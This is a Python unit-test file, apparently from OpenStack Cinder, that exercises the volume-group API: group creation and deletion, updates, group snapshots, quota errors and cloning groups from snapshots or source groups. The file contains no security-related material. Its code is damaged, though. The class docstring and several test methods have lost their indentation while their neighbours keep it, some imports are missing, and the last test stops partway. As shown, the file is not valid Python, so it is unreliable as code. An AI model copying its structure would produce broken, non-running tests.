from cinder import exception
import cinder.group
from cinder import objects
from cinder.objects import fields
from cinder.policies import group_snapshots as g_snap_policies
from cinder import quota
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder.tests.unit import test
from cinder.tests.unit import utils
GROUP_QUOTAS = quota.GROUP_QUOTAS
@ddt.ddt
class GroupAPITestCase(test.TestCase):
"""Test Case for group API."""
    def setUp(self):
        """Create the group API plus admin and plain-user request contexts."""
        super(GroupAPITestCase, self).setUp()
        self.group_api = cinder.group.API()
        self.ctxt = context.RequestContext(fake.USER_ID, fake.PROJECT_ID,
                                           auth_token=True,
                                           is_admin=True)
        self.user_ctxt = context.RequestContext(
            fake.USER_ID, fake.PROJECT_ID, auth_token=True)
    @mock.patch('cinder.objects.Group.get_by_id')
    def test_get(self, mock_group_get):
        """API.get should return whatever Group.get_by_id yields."""
        fake_group = {'name': 'fake_group'}
        mock_group_get.return_value = fake_group
        grp = self.group_api.get(self.ctxt, fake.GROUP_ID)
        self.assertEqual(fake_group, grp)
    @ddt.data(True, False)
    @mock.patch('cinder.objects.GroupList.get_all')
    @mock.patch('cinder.objects.GroupList.get_all_by_project')
    def test_get_all(self, is_admin, mock_get_all_by_project,
                     mock_get_all):
        """Admins with all_tenants get every group; users get their own."""
        self.group_api.LOG = mock.Mock()
        fake_groups = ['fake_group1', 'fake_group2']
        fake_groups_by_project = ['fake_group1']
        mock_get_all.return_value = fake_groups
        mock_get_all_by_project.return_value = fake_groups_by_project
        if is_admin:
            grps = self.group_api.get_all(self.ctxt,
                                          filters={'all_tenants': True})
            self.assertEqual(fake_groups, grps)
        else:
            grps = self.group_api.get_all(self.user_ctxt)
            self.assertEqual(fake_groups_by_project, grps)
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.delete_group')
    @mock.patch('cinder.db.volume_get_all_by_generic_group')
    @mock.patch('cinder.db.volumes_update')
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.db.group_type_get')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_create_delete(self, mock_volume_types_get,
                           mock_group_type_get, mock_group,
                           mock_update_quota, mock_cast_create_group,
                           mock_volumes_update, mock_volume_get_all,
                           mock_rpc_delete_group):
        """Create a group, then delete it (with volumes) and verify the DB
        update and RPC delete calls.

        NOTE: mock.patch decorators apply bottom-up, so the first mock
        parameters correspond to the lowest decorators.
        """
        mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[fake.VOLUME_TYPE_ID],
                                 availability_zone='nova', host=None,
                                 name=name, description=description,
                                 status=fields.GroupStatus.CREATING)
        mock_group.return_value = grp
        ret_group = self.group_api.create(self.ctxt, name, description,
                                          fake.GROUP_TYPE_ID,
                                          [fake.VOLUME_TYPE_ID],
                                          availability_zone='nova')
        self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
        # make the group deletable: hosted, available, not frozen
        ret_group.host = "test_host@fakedrv#fakepool"
        ret_group.status = fields.GroupStatus.AVAILABLE
        ret_group.assert_not_frozen = mock.Mock(return_value=True)
        ret_group.group_snapshots = []
        self.group_api.delete(self.ctxt, ret_group, delete_volumes=True)
        mock_volume_get_all.assert_called_once_with(mock.ANY, ret_group.id)
        mock_volumes_update.assert_called_once_with(self.ctxt, [])
        mock_rpc_delete_group.assert_called_once_with(self.ctxt, ret_group)
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.db.group_type_get_by_name')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_create_with_group_name(self, mock_volume_types_get,
                                    mock_group_type_get, mock_group,
                                    mock_update_quota, mock_cast_create_group):
        """Creating with a group-type *name* resolves the type by name."""
        mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[fake.VOLUME_TYPE_ID],
                                 availability_zone='nova', host=None,
                                 name=name, description=description,
                                 status=fields.GroupStatus.CREATING)
        mock_group.return_value = grp
        ret_group = self.group_api.create(self.ctxt, name, description,
                                          "fake-grouptype-name",
                                          [fake.VOLUME_TYPE_ID],
                                          availability_zone='nova')
        self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
        mock_group_type_get.assert_called_once_with(self.ctxt,
                                                    "fake-grouptype-name")
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.db.group_type_get')
    @mock.patch('cinder.db.group_type_get_by_name')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_create_with_uuid_format_group_type_name(
            self, mock_volume_types_get, mock_group_type_get_by_name,
            mock_group_type_get, mock_update_quota, mock_cast_create_group):
        """A UUID-shaped group-type name falls back to lookup by name."""
        uuid_format_type_name = fake.UUID1
        mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
        # the id lookup fails, forcing the fallback to the by-name lookup
        mock_group_type_get.side_effect = exception.GroupTypeNotFound(
            group_type_id=uuid_format_type_name)
        mock_group_type_get_by_name.return_value = {'id': fake.GROUP_TYPE_ID}
        ret_group = self.group_api.create(self.ctxt, "test_group", '',
                                          uuid_format_type_name,
                                          [fake.VOLUME_TYPE_ID],
                                          availability_zone='nova')
        self.assertEqual(ret_group["group_type_id"],
                         fake.GROUP_TYPE_ID)
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.db.group_type_get_by_name')
    @mock.patch('cinder.db.sqlalchemy.api._volume_type_get')
    @mock.patch('cinder.db.sqlalchemy.api._volume_type_get_by_name')
    def test_create_with_uuid_format_volume_type_name(
            self, mock_vol_t_get_by_name, mock_vol_types_get_by_id,
            mock_group_type_get, mock_update_quota, mock_cast_create_group):
        """A UUID-shaped volume-type name falls back to lookup by name."""
        uuid_format_name = fake.UUID1
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        volume_type = {'id': fake.VOLUME_TYPE_ID, 'name': uuid_format_name}
        # the id lookup fails, forcing the fallback to the by-name lookup
        mock_vol_types_get_by_id.side_effect = exception.VolumeTypeNotFound(
            volume_type_id=uuid_format_name)
        mock_vol_t_get_by_name.return_value = volume_type
        group = self.group_api.create(self.ctxt, "test_group",
                                      "this is a test group",
                                      "fake-grouptype-name",
                                      [uuid_format_name],
                                      availability_zone='nova')
        self.assertEqual(group["volume_type_ids"],
                         [volume_type['id']])
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.db.group_type_get_by_name')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_create_with_multi_types(self, mock_volume_types_get,
                                     mock_group_type_get,
                                     mock_update_quota,
                                     mock_cast_create_group):
        """Creating with several volume-type names records all their ids."""
        volume_types = [{'id': fake.VOLUME_TYPE_ID},
                        {'id': fake.VOLUME_TYPE2_ID}]
        mock_volume_types_get.return_value = volume_types
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        volume_type_names = ['fake-volume-type1', 'fake-volume-type2']
        name = "test_group"
        description = "this is a test group"
        group = self.group_api.create(self.ctxt, name, description,
                                      "fake-grouptype-name",
                                      volume_type_names,
                                      availability_zone='nova')
        self.assertEqual(group["volume_type_ids"],
                         [t['id'] for t in volume_types])
        self.assertEqual(group["group_type_id"], fake.GROUP_TYPE_ID)
        mock_group_type_get.assert_called_once_with(self.ctxt,
                                                    "fake-grouptype-name")
        mock_volume_types_get.assert_called_once_with(mock.ANY,
                                                      volume_type_names)
    @mock.patch('oslo_utils.timeutils.utcnow')
    @mock.patch('cinder.objects.Group')
    def test_reset_status(self, mock_group, mock_time_util):
        """reset_status must stamp updated_at and save the new status."""
        mock_time_util.return_value = "time_now"
        self.group_api.reset_status(self.ctxt, mock_group,
                                    fields.GroupStatus.AVAILABLE)
        update_field = {'updated_at': "time_now",
                        'status': fields.GroupStatus.AVAILABLE}
        mock_group.update.assert_called_once_with(update_field)
        mock_group.save.assert_called_once_with()
    @mock.patch.object(GROUP_QUOTAS, "reserve")
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.db.group_type_get_by_name')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_create_group_failed_update_quota(self,
                                              mock_volume_types_get,
                                              mock_group_type_get, mock_group,
                                              mock_group_quota_reserve):
        """An OverQuota during reservation surfaces as GroupLimitExceeded."""
        mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        fake_overs = ['groups']
        fake_quotas = {'groups': 1}
        fake_usages = {'groups': {'reserved': 0, 'in_use': 1}}
        mock_group_quota_reserve.side_effect = exception.OverQuota(
            overs=fake_overs,
            quotas=fake_quotas,
            usages=fake_usages)
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[fake.VOLUME_TYPE_ID],
                                 availability_zone='nova', host=None,
                                 name=name, description=description,
                                 status=fields.GroupStatus.CREATING)
        mock_group.return_value = grp
        self.assertRaises(exception.GroupLimitExceeded,
                          self.group_api.create,
                          self.ctxt, name, description,
                          "fake-grouptype-name",
                          [fake.VOLUME_TYPE_ID],
                          availability_zone='nova')
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.db.volume_get')
    def test__validate_add_volumes(self, mock_volume_get, mock_group):
        """_validate_add_volumes rejects an unsuitable volume id."""
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[fake.VOLUME_TYPE_ID],
                                 availability_zone='nova', host=None,
                                 name="name", description="description",
                                 status=fields.GroupStatus.CREATING)
        mock_group.return_value = grp
        # The DB lookup for id '123456789' returns a generic fake volume;
        # presumably its type/membership does not fit the group, which is
        # what triggers InvalidVolume — TODO(review): confirm which check.
        fake_volume_obj = fake_volume.fake_volume_obj(self.ctxt)
        mock_volume_get.return_value = fake_volume_obj
        self.assertRaises(exception.InvalidVolume,
                          self.group_api._validate_add_volumes, self.ctxt,
                          [], ['123456789'], grp)
    @ddt.data(['test_host@fakedrv#fakepool', 'test_host@fakedrv#fakepool'],
              ['test_host@fakedrv#fakepool', 'test_host2@fakedrv#fakepool'])
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.update_group')
    @mock.patch('cinder.db.volume_get_all_by_generic_group')
    @mock.patch('cinder.group.api.API._cast_create_group')
    @mock.patch('cinder.group.api.API.update_quota')
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.db.group_type_get')
    @mock.patch('cinder.db.volume_types_get_by_name_or_id')
    def test_update(self, hosts, mock_volume_types_get,
                    mock_group_type_get, mock_group,
                    mock_update_quota, mock_cast_create_group,
                    mock_volume_get_all, mock_rpc_update_group):
        """update() casts an RPC carrying the volumes to add and remove.

        Driven twice by ddt: once with the volumes on the group's own host
        and once with them on a different host (same cluster).
        """
        vol_type_dict = {'id': fake.VOLUME_TYPE_ID,
                         'name': 'fake_volume_type'}
        vol_type = objects.VolumeType(self.ctxt, **vol_type_dict)
        mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
        mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[fake.VOLUME_TYPE_ID],
                                 availability_zone='nova', host=None,
                                 name=name, description=description,
                                 status=fields.GroupStatus.CREATING)
        mock_group.return_value = grp
        ret_group = self.group_api.create(self.ctxt, name, description,
                                          fake.GROUP_TYPE_ID,
                                          [fake.VOLUME_TYPE_ID],
                                          availability_zone='nova')
        self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
        ret_group.volume_types = [vol_type]
        ret_group.host = hosts[0]
        # set resource_backend directly because ret_group
        # is instance of MagicMock
        ret_group.resource_backend = 'fake-cluster'
        ret_group.status = fields.GroupStatus.AVAILABLE
        ret_group.id = fake.GROUP_ID
        # vol1 is the volume being added; vol2 is already a group member
        # and is the one being removed.
        vol1 = utils.create_volume(
            self.ctxt, host=hosts[1],
            availability_zone=ret_group.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            cluster_name='fake-cluster')
        vol2 = utils.create_volume(
            self.ctxt, host=hosts[1],
            availability_zone=ret_group.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            group_id=fake.GROUP_ID,
            cluster_name='fake-cluster')
        vol2_dict = {
            'id': vol2.id,
            'group_id': fake.GROUP_ID,
            'volume_type_id': fake.VOLUME_TYPE_ID,
            'availability_zone': ret_group.availability_zone,
            'host': hosts[1],
            'status': 'available',
        }
        mock_volume_get_all.return_value = [vol2_dict]
        new_name = "new_group_name"
        new_desc = "this is a new group"
        self.group_api.update(self.ctxt, ret_group, new_name, new_desc,
                              vol1.id, vol2.id)
        mock_volume_get_all.assert_called_once_with(mock.ANY, ret_group.id)
        mock_rpc_update_group.assert_called_once_with(self.ctxt, ret_group,
                                                      add_volumes=vol1.id,
                                                      remove_volumes=vol2.id)
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.context.RequestContext.authorize')
def test_get_group_snapshot(self, mock_authorize, mock_group_snap):
fake_group_snap = 'fake_group_snap'
mock_group_snap.return_value = fake_group_snap
grp_snap = self.group_api.get_group_snapshot(
self.ctxt, fake.GROUP_SNAPSHOT_ID)
self.assertEqual(fake_group_snap, grp_snap)
mock_authorize.assert_called_once_with(
g_snap_policies.GET_POLICY,
target_obj=fake_group_snap)
    @ddt.data(True, False)
    @mock.patch('cinder.objects.GroupSnapshotList.get_all')
    @mock.patch('cinder.objects.GroupSnapshotList.get_all_by_project')
    def test_get_all_group_snapshots(self, is_admin,
                                     mock_get_all_by_project,
                                     mock_get_all):
        """Admins with all_tenants get everything; users get their project.

        Driven twice by ddt: is_admin True and False.
        """
        fake_group_snaps = ['fake_group_snap1', 'fake_group_snap2']
        fake_group_snaps_by_project = ['fake_group_snap1']
        mock_get_all.return_value = fake_group_snaps
        mock_get_all_by_project.return_value = fake_group_snaps_by_project
        if is_admin:
            # Admin context with all_tenants goes through get_all().
            grp_snaps = self.group_api.get_all_group_snapshots(
                self.ctxt, filters={'all_tenants': True})
            self.assertEqual(fake_group_snaps, grp_snaps)
        else:
            # Regular user context is scoped to its own project.
            grp_snaps = self.group_api.get_all_group_snapshots(
                self.user_ctxt)
            self.assertEqual(fake_group_snaps_by_project, grp_snaps)
@mock.patch('cinder.objects.GroupSnapshot')
def test_update_group_snapshot(self, mock_group_snap):
grp_snap_update = {"name": "new_name",
"description": "This is a new description"}
self.group_api.update_group_snapshot(self.ctxt, mock_group_snap,
grp_snap_update)
mock_group_snap.update.assert_called_once_with(grp_snap_update)
mock_group_snap.save.assert_called_once_with()
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.delete_group_snapshot')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_snapshot')
    @mock.patch('cinder.volume.api.API.create_snapshots_in_db')
    @mock.patch('cinder.objects.Group')
    @mock.patch('cinder.objects.GroupSnapshot')
    @mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
    def test_create_delete_group_snapshot(self,
                                          mock_snap_get_all,
                                          mock_group_snap, mock_group,
                                          mock_create_in_db,
                                          mock_create_api, mock_delete_api):
        """Create then delete a group snapshot; verify dispatched calls."""
        name = "fake_name"
        description = "fake description"
        mock_group.id = fake.GROUP_ID
        mock_group.group_type_id = fake.GROUP_TYPE_ID
        mock_group.assert_not_frozen = mock.Mock(return_value=True)
        mock_group.volumes = []
        ret_group_snap = self.group_api.create_group_snapshot(
            self.ctxt, mock_group, name, description)
        # NOTE(review): this return_value is assigned *after* the call
        # above, so during the call the mock returned a plain MagicMock —
        # confirm whether this ordering is intentional.
        mock_snap_get_all.return_value = []
        options = {'group_id': fake.GROUP_ID,
                   'user_id': self.ctxt.user_id,
                   'project_id': self.ctxt.project_id,
                   'status': "creating",
                   'name': name,
                   'description': description,
                   'group_type_id': fake.GROUP_TYPE_ID}
        # The snapshot object must be built with exactly these fields.
        mock_group_snap.assert_called_once_with(self.ctxt, **options)
        ret_group_snap.create.assert_called_once_with()
        mock_create_in_db.assert_called_once_with(self.ctxt, [],
                                                  ret_group_snap.name,
                                                  ret_group_snap.description,
                                                  None,
                                                  ret_group_snap.id)
        mock_create_api.assert_called_once_with(self.ctxt, ret_group_snap)
        ret_group_snap.assert_not_frozen = mock.Mock(return_value=True)
        self.group_api.delete_group_snapshot(self.ctxt, ret_group_snap)
        mock_delete_api.assert_called_once_with(mock.ANY, ret_group_snap)
    @mock.patch('cinder.volume.api.API.delete')
    @mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
    @mock.patch('cinder.db.group_volume_type_mapping_create')
    @mock.patch('cinder.volume.api.API.create')
    @mock.patch('cinder.objects.GroupSnapshot.get_by_id')
    @mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
    @mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
    def test_create_group_from_snap_volume_failed(
            self, mock_volume_get_all,
            mock_rpc_create_group_from_src,
            mock_snap_get_all, mock_group_snap_get,
            mock_volume_api_create,
            mock_mapping_create,
            mock_get_volume_type, mock_volume_delete):
        """A volume-create failure rolls back and skips the RPC cast."""
        # The first (and only) volume creation attempt fails.
        mock_volume_api_create.side_effect = [exception.CinderException]
        vol_type = fake_volume.fake_volume_type_obj(
            self.ctxt,
            id=fake.VOLUME_TYPE_ID,
            name='fake_volume_type')
        mock_get_volume_type.return_value = vol_type
        grp_snap = utils.create_group_snapshot(
            self.ctxt, fake.GROUP_ID,
            group_type_id=fake.GROUP_TYPE_ID,
            status=fields.GroupStatus.CREATING)
        mock_group_snap_get.return_value = grp_snap
        # vol1/snap belong to the source group; vol2 is the clone the new
        # group would get from the snapshot.
        vol1 = utils.create_volume(
            self.ctxt,
            availability_zone='nova',
            volume_type_id=vol_type['id'],
            group_id=fake.GROUP_ID)
        snap = utils.create_snapshot(self.ctxt, vol1.id,
                                     volume_type_id=vol_type['id'],
                                     status=fields.GroupStatus.CREATING)
        mock_snap_get_all.return_value = [snap]
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type['id']],
                                 availability_zone='nova',
                                 name=name, description=description,
                                 group_snapshot_id=grp_snap.id,
                                 status=fields.GroupStatus.CREATING)
        vol2 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=vol_type['id'],
            group_id=grp.id,
            snapshot_id=snap.id)
        mock_volume_get_all.return_value = [vol2]
        self.assertRaises(
            exception.CinderException,
            self.group_api._create_group_from_group_snapshot,
            self.ctxt, grp, grp_snap.id)
        mock_volume_api_create.assert_called_once_with(
            self.ctxt, 1, None, None,
            availability_zone=grp.availability_zone,
            group_snapshot=grp_snap,
            group=grp,
            snapshot=snap,
            volume_type=vol_type)
        # On failure no RPC is cast and the created volume is cleaned up.
        mock_rpc_create_group_from_src.assert_not_called()
        mock_volume_delete.assert_called_once_with(self.ctxt, vol2)
        vol2.destroy()
        grp.destroy()
        snap.destroy()
        vol1.destroy()
        grp_snap.destroy()
    @mock.patch('cinder.group.api.API._update_volumes_host')
    @mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
    @mock.patch('cinder.db.group_volume_type_mapping_create')
    @mock.patch('cinder.volume.api.API.create')
    @mock.patch('cinder.objects.GroupSnapshot.get_by_id')
    @mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
    @mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
    def test_create_group_from_snap(self, mock_volume_get_all,
                                    mock_rpc_create_group_from_src,
                                    mock_snap_get_all, mock_group_snap_get,
                                    mock_volume_api_create,
                                    mock_mapping_create,
                                    mock_get_volume_type,
                                    mock_update_volumes_host):
        """Creating a group from a group snapshot creates one volume per
        member snapshot, casts the RPC and syncs the volumes' host.
        """
        vol_type = fake_volume.fake_volume_type_obj(
            self.ctxt,
            id=fake.VOLUME_TYPE_ID,
            name='fake_volume_type')
        mock_get_volume_type.return_value = vol_type
        grp_snap = utils.create_group_snapshot(
            self.ctxt, fake.GROUP_ID,
            group_type_id=fake.GROUP_TYPE_ID,
            status=fields.GroupStatus.CREATING)
        mock_group_snap_get.return_value = grp_snap
        # vol1/snap belong to the source group; vol2 is the clone created
        # from the snapshot for the new group.
        vol1 = utils.create_volume(
            self.ctxt,
            availability_zone='nova',
            volume_type_id=vol_type['id'],
            group_id=fake.GROUP_ID)
        snap = utils.create_snapshot(self.ctxt, vol1.id,
                                     volume_type_id=vol_type['id'],
                                     status=fields.GroupStatus.CREATING)
        mock_snap_get_all.return_value = [snap]
        name = "test_group"
        description = "this is a test group"
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type['id']],
                                 availability_zone='nova',
                                 name=name, description=description,
                                 group_snapshot_id=grp_snap.id,
                                 status=fields.GroupStatus.CREATING)
        vol2 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=vol_type['id'],
            group_id=grp.id,
            snapshot_id=snap.id)
        mock_volume_get_all.return_value = [vol2]
        self.group_api._create_group_from_group_snapshot(self.ctxt, grp,
                                                         grp_snap.id)
        mock_volume_api_create.assert_called_once_with(
            self.ctxt, 1, None, None,
            availability_zone=grp.availability_zone,
            group_snapshot=grp_snap,
            group=grp,
            snapshot=snap,
            volume_type=vol_type)
        mock_rpc_create_group_from_src.assert_called_once_with(
            self.ctxt, grp, grp_snap)
        mock_update_volumes_host.assert_called_once_with(
            self.ctxt, grp
        )
        vol2.destroy()
        grp.destroy()
        snap.destroy()
        vol1.destroy()
        grp_snap.destroy()
    @mock.patch('cinder.group.api.API._update_volumes_host')
    @mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
    @mock.patch('cinder.db.group_volume_type_mapping_create')
    @mock.patch('cinder.volume.api.API.create')
    @mock.patch('cinder.objects.Group.get_by_id')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
    @mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
    def test_create_group_from_group(self, mock_volume_get_all,
                                     mock_rpc_create_group_from_src,
                                     mock_group_get,
                                     mock_volume_api_create,
                                     mock_mapping_create,
                                     mock_get_volume_type,
                                     mock_update_volumes_host):
        """Creating a group from a source group clones each source volume
        and casts the create-from-src RPC with the source group.
        """
        vol_type = fake_volume.fake_volume_type_obj(
            self.ctxt,
            id=fake.VOLUME_TYPE_ID,
            name='fake_volume_type')
        mock_get_volume_type.return_value = vol_type
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type['id']],
                                 availability_zone='nova',
                                 status=fields.GroupStatus.CREATING)
        mock_group_get.return_value = grp
        vol = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            group_id=grp.id)
        mock_volume_get_all.return_value = [vol]
        grp2 = utils.create_group(self.ctxt,
                                  group_type_id=fake.GROUP_TYPE_ID,
                                  volume_type_ids=[vol_type['id']],
                                  availability_zone='nova',
                                  source_group_id=grp.id,
                                  status=fields.GroupStatus.CREATING)
        # vol2 is the clone of ``vol`` that lives in the new group.
        vol2 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=vol_type['id'],
            group_id=grp2.id,
            source_volid=vol.id)
        self.group_api._create_group_from_source_group(self.ctxt, grp2,
                                                       grp.id)
        mock_volume_api_create.assert_called_once_with(
            self.ctxt, 1, None, None,
            availability_zone=grp.availability_zone,
            source_group=grp,
            group=grp2,
            source_volume=vol,
            volume_type=vol_type)
        mock_rpc_create_group_from_src.assert_called_once_with(
            self.ctxt, grp2, None, grp)
        mock_update_volumes_host.assert_called_once_with(
            self.ctxt, grp2
        )
        vol2.destroy()
        grp2.destroy()
        vol.destroy()
        grp.destroy()
    @mock.patch('cinder.volume.api.API.delete')
    @mock.patch('cinder.objects.VolumeType.get_by_name_or_id')
    @mock.patch('cinder.db.group_volume_type_mapping_create')
    @mock.patch('cinder.volume.api.API.create')
    @mock.patch('cinder.objects.Group.get_by_id')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.create_group_from_src')
    @mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
    def test_create_group_from_group_create_volume_failed(
            self, mock_volume_get_all, mock_rpc_create_group_from_src,
            mock_group_get, mock_volume_api_create, mock_mapping_create,
            mock_get_volume_type, mock_volume_delete):
        """If cloning the second volume fails, the first clone is deleted
        and no RPC is cast.
        """
        vol_type = fake_volume.fake_volume_type_obj(
            self.ctxt,
            id=fake.VOLUME_TYPE_ID,
            name='fake_volume_type')
        mock_get_volume_type.return_value = vol_type
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type['id']],
                                 availability_zone='nova',
                                 status=fields.GroupStatus.CREATING)
        mock_group_get.return_value = grp
        vol1 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            group_id=grp.id)
        vol2 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            group_id=grp.id)
        # First call lists both source volumes; the rollback path then
        # lists only the volume that was successfully created.
        mock_volume_get_all.side_effect = [[vol1, vol2], [vol1]]
        grp2 = utils.create_group(self.ctxt,
                                  group_type_id=fake.GROUP_TYPE_ID,
                                  volume_type_ids=[vol_type['id']],
                                  availability_zone='nova',
                                  source_group_id=grp.id,
                                  status=fields.GroupStatus.CREATING)
        # First clone succeeds, the second raises.
        mock_volume_api_create.side_effect = [None, exception.CinderException]
        self.assertRaises(
            exception.CinderException,
            self.group_api._create_group_from_source_group,
            self.ctxt, grp2, grp.id)
        mock_rpc_create_group_from_src.assert_not_called()
        mock_volume_delete.assert_called_once_with(self.ctxt, vol1)
        grp2.destroy()
        vol2.destroy()
        vol1.destroy()
        grp.destroy()
@mock.patch('cinder.group.api.API._create_group_from_group_snapshot')
@mock.patch('cinder.group.api.API._create_group_from_source_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.objects.GroupSnapshot.get_by_id')
@mock.patch('cinder.objects.SnapshotList.get_all_for_group_snapshot')
@mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.validate_host_capacity')
def test_create_from_src(self, mock_validate_host, mock_snap_get_all,
mock_group_snap_get, mock_update_quota,
mock_create_from_group,
mock_create_from_snap):
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova',
name=name, description=description,
status=fields.GroupStatus.AVAILABLE,)
vol1 = utils.create_volume(
self.ctxt,
availability_zone='nova',
volume_type_id=fake.VOLUME_TYPE_ID,
group_id=grp.id)
snap = utils.create_snapshot(self.ctxt, vol1.id,
volume_type_id=fake.VOLUME_TYPE_ID,
status=fields.SnapshotStatus.AVAILABLE)
mock_snap_get_all.return_value = [snap]
mock_validate_host.return_host = True
grp_snap = utils.create_group_snapshot(
self.ctxt, grp.id,
group_type_id=fake.GROUP_TYPE_ID,
status=fields.GroupStatus.AVAILABLE)
mock_group_snap_get.return_value = grp_snap
grp2 = utils.create_group(self.ctxt,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova',
name=name, description=description,
status=fields.GroupStatus.CREATING,
group_snapshot_id=grp_snap.id)
with mock.patch('cinder.objects.Group') as mock_group:
mock_group.return_value = grp2
with mock.patch('cinder.objects.group.Group.create'):
ret_group = self.group_api.create_from_src(
self.ctxt, name, description,
group_snapshot_id=grp_snap.id,
source_group_id=None)
self.assertEqual(grp2.obj_to_primitive(),
ret_group.obj_to_primitive())
mock_create_from_snap.assert_called_once_with(
self.ctxt, grp2, grp_snap.id)
snap.destroy()
grp_snap.destroy()
vol1.destroy()
grp.destroy()
grp2.destroy()
@mock.patch('oslo_utils.timeutils.utcnow')
@mock.patch('cinder.objects.GroupSnapshot')
def test_reset_group_snapshot_status(self,
mock_group_snapshot,
mock_time_util):
mock_time_util.return_value = "time_now"
self.group_api.reset_group_snapshot_status(
self.ctxt, mock_group_snapshot, fields.GroupSnapshotStatus.ERROR)
update_field = {'updated_at': "time_now",
'status': fields.GroupSnapshotStatus.ERROR}
mock_group_snapshot.update.assert_called_once_with(update_field)
mock_group_snapshot.save.assert_called_once_with()
@mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.validate_host_capacity')
def test_create_group_from_src_frozen(self, mock_validate_host):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
mock_validate_host.return_value = True
